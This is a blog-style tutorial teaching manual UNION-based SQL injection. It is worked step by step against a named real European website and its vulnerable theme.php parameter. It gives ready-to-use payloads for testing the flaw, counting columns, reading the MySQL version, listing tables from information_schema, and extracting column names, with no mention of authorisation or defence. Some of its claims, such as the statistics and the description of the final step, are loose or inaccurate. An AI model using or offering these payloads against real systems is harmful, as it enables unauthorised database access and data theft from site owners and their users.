Hey guys! I have taken such a long time delivering you with some information, so today I thought to teach you some interesting stuff. There are over 30 million of sites available on internet and 16% of them are highly vulnerable to SQL injection attack. In this article I will teach you what exactly is SQL injection, how it works and how to perform. I have already taught you some basics in my last article. I advice you to take a look at my previous article before you continue reading this.
Today we are gonna access the database of a European site http://www.adas-fusion.eu/
Recently I have found a link vulnerable to SQL injection.
What is SQL Injection?
SQL injection is an attack used to exploit a security vulnerability in a website. This vulnerability occurs when the sever gives the direct response to the client. An attacker can communicate with the sever through MySQL by giving SQL commands.This happens because the user input is incorrectly filtered by the website. Taking advantage of this an attacker can inject a piece of code into the database and can take control over it.
Anyways, I am just going to teach you how to get the access to the database and retrieving the content from it. This will be explained manually so you gotta pay some attention. There are several tools which perform this attack automatically, all you just need to do is, provide the tool with a vulnerable link.
So let’s get started!!!
Step 1: Checking if the link is vulnerable or not.
This is the vulnerable link of the site which I mentioned above, http://www.adas-fusion.eu/theme.php?id=2. To know whether the link is vulnerable or not just add “ ‘ ” (Single quote) at the end of the link. That will look like this:
You can see that when you open the link by adding a single quote you are getting an error saying:
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1″
If the website is displaying the above line then it means, that this site is SQL injection vulnerable! Hence we can proceed further getting the number of columns in it.
Step 2: Finding number of columns in the database.
Search the link followed by the syntax “order by number–” and hit enter. Replace “number“ by any number which you assume to be the number of columns in the targeted website. Start with the number ’10’ hence the link will look like,
If you are getting an error display in the page then that means, the actual number of columns is less than number you assumed. So now try each of 9,8,7…. so on till you get a page without error.
For this site you will get error till 7 and at 6 you will have a proper page display without any error. Just check it out here:
So that means there are 6 columns in the database!
Step 3: Finding the vulnerable columns
The next command goes like this:
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,6–
After you open this link you will find the vulnerable column that is 6. To know the vulnerable column just check the column number in the page.
Step 4: Finding the version of the MySQL database.
If the version of the database is above 5.0 then we can move further. For the sites less than version 5.0 we use blind SQL injection. To know the version of the database just type the following:
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,version()–
Here the version is 5.1.67 therefore it can be hacked using this method, lets move ahead.
Step 5: Retrieving the tables.
Now we use group_concat(table_name) function to get the tables available.
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,group_concat(table_name) from information_schema.tables
After the page gets loaded you will get the entire list of the tables available. Now next you just have to note down the important tables (tables in caps are present by default, therefore the important data is always present in the tables named with lowercase, but not always).
Step 6: Getting the data from the tables.
This is the last step… Now you get the data from the tables which you have noted in the above step.
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,column_name from information_schema.columns where table_name=char(ASCII)–
Just replace the ASCII with the ASCII value of the table. Online string to ASCII converters are available.
The above is the ASCII code of the table task.
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,column_name from information_schema.columns where table_name=char(116,97,115,107)–
This link will give you the data contained in the table…..
That’s it… Feel free to comment!